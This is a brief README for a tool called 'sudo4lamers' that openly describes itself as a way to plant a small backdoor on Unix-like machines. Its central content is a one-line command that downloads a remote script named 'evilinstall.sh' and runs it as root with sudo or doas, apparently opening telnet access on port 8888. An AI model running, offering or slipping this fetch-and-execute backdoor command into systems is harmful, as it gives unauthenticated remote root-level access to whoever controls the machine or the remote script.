# sudo4lamers


## Introduction 


This soft is a workaround to access a machine, easily and with a single command line. 
It can be customized to make a little backdoor into a nix machine. 

This demonstrates that "sudo" is a power tool to do many things. 


## Run out of SUDO 
This shows how to use sudo, in order to gain access to the machine over telnet. 

`
wget -c https://gitlab.com/openbsd98324/sudo4lamers/-/raw/master/evilinstall.sh -O /tmp/evilinstall.sh ; sudo sh /tmp/evilinstall.sh  
`

Example: telnet localhost 8888


## Linux, OpenBSD and other nix.

sudo and doas offer the same possibility. Run doas as above (instead of sudo).


Have Fun!


